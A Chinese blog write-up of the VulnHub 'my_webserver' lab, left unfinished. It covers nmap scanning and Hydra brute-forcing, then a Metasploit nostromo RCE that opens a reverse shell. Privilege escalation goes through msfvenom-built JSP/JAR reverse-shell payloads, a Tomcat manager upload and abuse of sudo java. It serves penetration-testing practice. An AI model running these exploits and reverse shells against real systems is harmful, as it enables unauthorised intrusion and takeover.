首页 > 其他分享 >vulnhub之my_webserver

vulnhub之my_webserver

时间:2023-02-06 00:55:37浏览次数:39  
标签:multi shell 62.129 exploit 192.168 webserver vulnhub tcp my

一、信息收集

1、c段扫描,获取靶机IP

──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24                       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.130
Host is up (0.00047s latency).
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00038s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

  因为对局域网内的IP较熟悉,所以知道192.168.62.130为新增靶机的IP地址。

2、靶机开放端口扫描

①tcp协议端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT
Nmap scan report for 192.168.62.130
Host is up (0.0022s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

②udp协议端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT
Warning: 192.168.62.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.130
Host is up (0.00053s latency).
All 65535 scanned ports on 192.168.62.130 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
                                                             
端口运行服务版本:
──(kali㉿kali)-[/usr/share/wordlists] └─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT Nmap scan report for 192.168.62.130 Host is up (0.00068s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 2222/tcp open http nostromo 1.9.6 3306/tcp open mysql MySQL (unauthorized) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8081/tcp open http nginx 1.14.2 MAC Address: 00:0C:29:39:83:54 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds

 

二、getshell

 1、22号端口渗透

①查询版本漏洞--无

──(kali㉿kali)-[/usr/share/wordlists]
└─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2                        
Exploits: No Results
Shellcodes: No Results

②简单爆破--无

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.62.130:22/
[ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).                                                                                                   

 3、2222端口利用

  ①搜索2222端口历史漏洞

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

  ②发现一个RCE漏洞,尝试利用

msf6 > use 0                                                                                                                                                                                                       
[*] Using configured payload cmd/unix/reverse_perl                                                                                                                                                                 
msf6 exploit(multi/http/nostromo_code_exec) > option                                                                                                                                                               
[-] Unknown command: option                                                                                                                                                                                        
msf6 exploit(multi/http/nostromo_code_exec) > options                                                                                                                                                              
                                                                                                                                                                                                                   
Module options (exploit/multi/http/nostromo_code_exec):                                                                                                                                                            
                                                                                                                                                                                                                   
   Name     Current Setting  Required  Description                                                                                                                                                                 
   ----     ---------------  --------  -----------                                                                                                                                                                 
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                                                
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit                                                                                
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.62.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 2222 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.62.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic (Unix In-Memory)

 

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800

id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$

  获取到shell!!!!

4、3306端口渗透--此为个人尝试

①简单爆破--mysql中应该是开启了白名单功能

──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.62.130:3306/
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server

 5、8008

6、8080端口利用

  浏览器输入http://ip:port浏览计算机运行的服务,根据运行的tomcat服务找出其后台URL:

 

 

 

 

三、提权

 1、收集系统信息

daemon@webserver:/usr/bin$ ls -l /etc/crontab
ls -l /etc/crontab
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab
daemon@webserver:/usr/bin$ ls -l /etc/passwd
ls -l /etc/passwd
-rw-r--r-- 1 root root 1447 Mar 31  2020 /etc/passwd
daemon@webserver:/usr/bin$ sudo -l
sudo -l


sudo: unable to resolve host webserver: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

②find / -writable -type f 2>/dev/null|grep *users.xml

 

 

 ③发现tomcat后台登陆人员配置文件并查看,获得tomcat的后台用户名和密码

 

 ④登陆tomcat的后台,发现有文件上传的功能

 

 ⑤msfvenom制作木马

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=8888 -f jar > doit.war 

⑥在tomcat后台将获取到的木马上传,设置成功后点击运行(点击红框中的名字)

 

 ⑦msf配置LHOST,LPORT,PAYLOAD(与制作密码时一致)监听木马设置的端口,然后运行

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run
                                                                                                                                                                                                                   
[*] Started reverse TCP handler on 192.168.62.129:8888                                                                                                                                                        
[*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800                                                                                                      
                                                                                                                                                                                                                   
python -c 'import pty;pty.spawn("/bin/bash")'          //利用python反弹shell     
tomcat@webserver:~$

⑧查看tomcat用户的权限,发现可以使用root权限执行java服务。

tomcat@webserver:/tmp$ sudo -l
sudo -l
sudo: unable to resolve host webserver: Name or service not known
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java

⑨msfvenom制作.jar格式木马

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar

⑩使用upload功能将木马上传到靶机(我这里不知道为啥upload功能用不了,所以使用scp命令复制文件)

⑪msf设置监听9999端口

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

⑫以root权限运行.jar格式文件(不知为啥我这里运行出错了,看网上说是文件传输过程中损坏了,试着使用sftp传输文件也无法运行,所以得找其他方法进行提权,正常的话执行⑬即为root权限了)

sudo -u root java -jar xiaoliyu.jar

⑬连接后使用python反弹shell,可以发现已经为root权限

 

 

未完待续

 

 

标签:multi,shell,62.129,exploit,192.168,webserver,vulnhub,tcp,my
From: https://www.cnblogs.com/xiaoliyulixianji/p/17084564.html

相关文章

  • vulnhub:easy_cloudantivirus靶机
    kali:192.168.111.111靶机:192.168.111.177信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.177访问8080端口在输入框填入双引号发现报错......
  • Spring整合MyBatis及Junit4.11报错:No tests found matching [{ExactMatcher:fDisplayN
    发生缘由复习Spring整合MyBatis及Junit运行环境VSCode版本:1.72.0(usersetup)jdk版本:jdk-8电脑系统:win10spring-context:5.2.10.RELEASEjunit:4.11spring-test:5.......
  • Oracle版面本的MySQL8.0的配置文件 my.cnf
    ##############################  [client]port=3306socket=/home/work/mysql_3306/tmp/mysql.sock[mysqld]#在mysql8.0以上版本默认为caching_sha2_passwo......
  • mysql基础知识
    1、sql注入sql注入就是通过把sql命令注入到后台数据库执行一些恶意的操作。注入方式比如通过web表单提交一些恶意字符串。比如用户做登录验证的时候,我们可能会根据用户填......
  • 创建my_strstr函数
    #include<assert.h>char*my_strstr(char*p1,char*p2){assert(p1!=NULL);assert(p2!=NULL);//保证指针有效性char*s1=p1;char*s2=p2;char*cur=p1......
  • mysql_gtid学习笔记
    一、GTID概述GTID是MYSQL5.6新增的特性,GTID(GlobalTransactionIdentifier)全称为全局事务标示符,用以数据库实例事务唯一标识,其组成主要是source_id和transaction_id即GT......
  • php7 安装mysqli实例讲解
    php7怎么安装Mysqli?Centosphp7安装mysqli扩展心得在新配服务器时发现,php无法连接到mysql。通过phpinfo发现。根本没有显示mysqli的相关配置。经过一系列研究。总结了......
  • My Code Style
    大家都在写,跟风。头文件万能头。因为我刚学OI的时候怎么都背不住algorithm怎么拼(变量数组开全局,一些前后重名/只在某一部分用的变量开局部。尽量不使用指针/stl......
  • MyBatis的使用八(动态SQL)
    本主要讲述mybatis处理动态sql语句一.问题引入前端展示的数据表格中,查询条件可能不止一个,如何将用户输入的多个查询条件,拼接到sql语句中呢?DynamicMapper接口声......
  • Spring整合Mybatis
    首先导入依赖1<properties>2<!--版本锁定-->3<spring.version>5.0.2.RELEASE</spring.version>4<log4j.version>1.2.17</log4j.version>......